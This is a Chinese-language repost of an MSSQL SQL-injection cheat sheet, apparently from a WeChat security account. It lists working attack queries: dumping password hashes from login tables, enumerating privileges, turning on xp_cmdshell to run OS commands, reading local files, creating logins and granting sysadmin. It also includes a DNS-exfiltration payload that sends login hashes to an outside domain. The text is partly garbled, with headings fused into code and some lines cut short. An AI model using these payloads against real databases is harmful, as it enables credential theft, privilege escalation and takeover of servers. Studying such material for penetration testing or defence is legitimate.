版本
SELECT @@version当前用户
SELECT user_name();SELECT system_user;SELECT user;SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
列出用户
SELECT name FROM master..syslogin列出密码哈希值
SELECT name, password FROM master..sysxlogins — priv, mssql 2000;SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins — priv, mssql 2000. Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.SELECT name, password_hash FROM master.sys.sql_logins — priv, mssql 2005;SELECT name + ‘-‘ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins — priv, mssql 2005
密码破解
MSSQL 2000 and 2005 Hashes are both SHA1-based. phrasen|drescher can crack these.列出权限
— current privs on a particular object in 2005, 2008SELECT permission_name FROM master..fn_my_permissions(null, ‘DATABASE’); — current databaseSELECT permission_name FROM master..fn_my_permissions(null, ‘SERVER’); — current serverSELECT permission_name FROM master..fn_my_permissions(‘master..syslogins’, ‘OBJECT’); –permissions on a tableSELECT permission_name FROM master..fn_my_permissions(‘sa’, ‘USER’);–permissions on a user– current privs in 2005, 2008SELECT is_srvrolemember(‘sysadmin’);SELECT is_srvrolemember(‘dbcreator’);SELECT is_srvrolemember(‘bulkadmin’);SELECT is_srvrolemember(‘diskadmin’);SELECT is_srvrolemember(‘processadmin’);SELECT is_srvrolemember(‘serveradmin’);SELECT is_srvrolemember(‘setupadmin’);SELECT is_srvrolemember(‘securityadmin’);— who has a particular priv? 2005, 2008SELECT name FROM master..syslogins WHERE denylogin = 0;SELECT name FROM master..syslogins WHERE hasaccess = 1;SELECT name FROM master..syslogins WHERE isntname = 0;SELECT name FROM master..syslogins WHERE isntgroup = 0;SELECT name FROM master..syslogins WHERE sysadmin = 1;SELECT name FROM master..syslogins WHERE securityadmin = 1;SELECT name FROM master..syslogins WHERE serveradmin = 1;SELECT name FROM master..syslogins WHERE setupadmin = 1;SELECT name FROM master..syslogins WHERE processadmin = 1;SELECT name FROM master..syslogins WHERE diskadmin = 1;SELECT name FROM master..syslogins WHERE dbcreator = 1;SELECT name FROM master..syslogins WHERE bulkadmin = 1;
列出 DBA 帐户
SELECT is_srvrolemember(‘sysadmin’); — is your account a sysadmin? returns 1 for true, 0 for false, NULL for invalid role. Also try ‘bulkadmin’, ‘systemadmin’ and other values from the documentationSELECT is_srvrolemember(‘sysadmin’, ‘sa’); — is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.SELECT name FROM master..syslogins WHERE sysadmin = ‘1’ — tested on 200
当前数据库
SELECT DB_NAME()列出数据库
SELECT name FROM master..sysdatabases;SELECT DB_NAME(N); — for N = 0, 1, 2,
列表列
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB onlySELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
列表
SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for viewsSELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
从列名称查找表
— NB: This example works only for the current database. If you wan’t to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects).SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = ‘U’ AND syscolumns.name LIKE ‘%PASSWORD%’ — this lists table, column for each column containing the word ‘password’
选择第 N 行
SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC — gets 9th row选择第 N 个字符
SELECT substring(‘abcd’, 3, 1) — returns cBitwise AND
SELECT 6 & 2 — returns 2SELECT 6 & 1 — returns
ASCII 值 -> 字符
SELECT char(0x41) — returns A字符 -> ASCII 值
SELECT ascii(‘A’) – returns 65字符串连接
SELECT ‘A’ + ‘B’ – returns Aif语句
IF (1=1) SELECT 1 ELSE SELECT 2 — returns 1避免引号
SELECT char(65)+char(66) — returns AB延时
WAITFOR DELAY ‘0:0:5’ — pause for 5 seconds发出 DNS 请求
declare @host varchar(800); select @host = name FROM master..syslogins; exec(‘master..xp_getfiledetails ”’ + @host + ‘c$boot.ini”’); — nonpriv, works on 2000declare @host varchar(800); select @host = name + ‘-‘ + master.sys.fn_varbintohexstr(password_hash) + ‘.2.pentestmonkey.net’ from sys.sql_logins; exec(‘xp_fileexist ”’ + @host + ‘c$boot.ini”’); — priv, works on 2005– NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.— Also check out theDNS tunnel feature of sqlninja
命令执行
EXEC xp_cmdshell ‘net user’; — privOn MSSQL 2005 you may need to reactivate xp_cmdshell first as it’s disabled by default:EXEC sp_configure ‘show advanced options’, 1; — privRECONFIGURE; — privEXEC sp_configure ‘xp_cmdshell’, 1; — privRECONFIGURE; — priv
本地文件访问
CREATE TABLE mydata (line varchar(8000));BULK INSERT mydata FROM ‘c:boot.ini’;DROP TABLE mydata;
主机名、IP 地址
SELECT HOST_NAME(创建用户
EXEC sp_addlogin ‘user’, ‘pass’; — priv删除用户
EXEC sp_droplogin ‘user’; — pri使用户成为 DBA
EXEC master.dbo.sp_addsrvrolemember ‘user’, ‘sysadmin; — priv数据库文件的位置
EXEC sp_helpdb master; –location of master.mdfEXEC sp_helpdb pubs; –location of pubs.mdf
默认/系统数据库
northwindmodelmsdbpubs — not on sql server 2005tempdb
原文始发于微信公众号(TtTeam):MSSQL 注入笔记
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论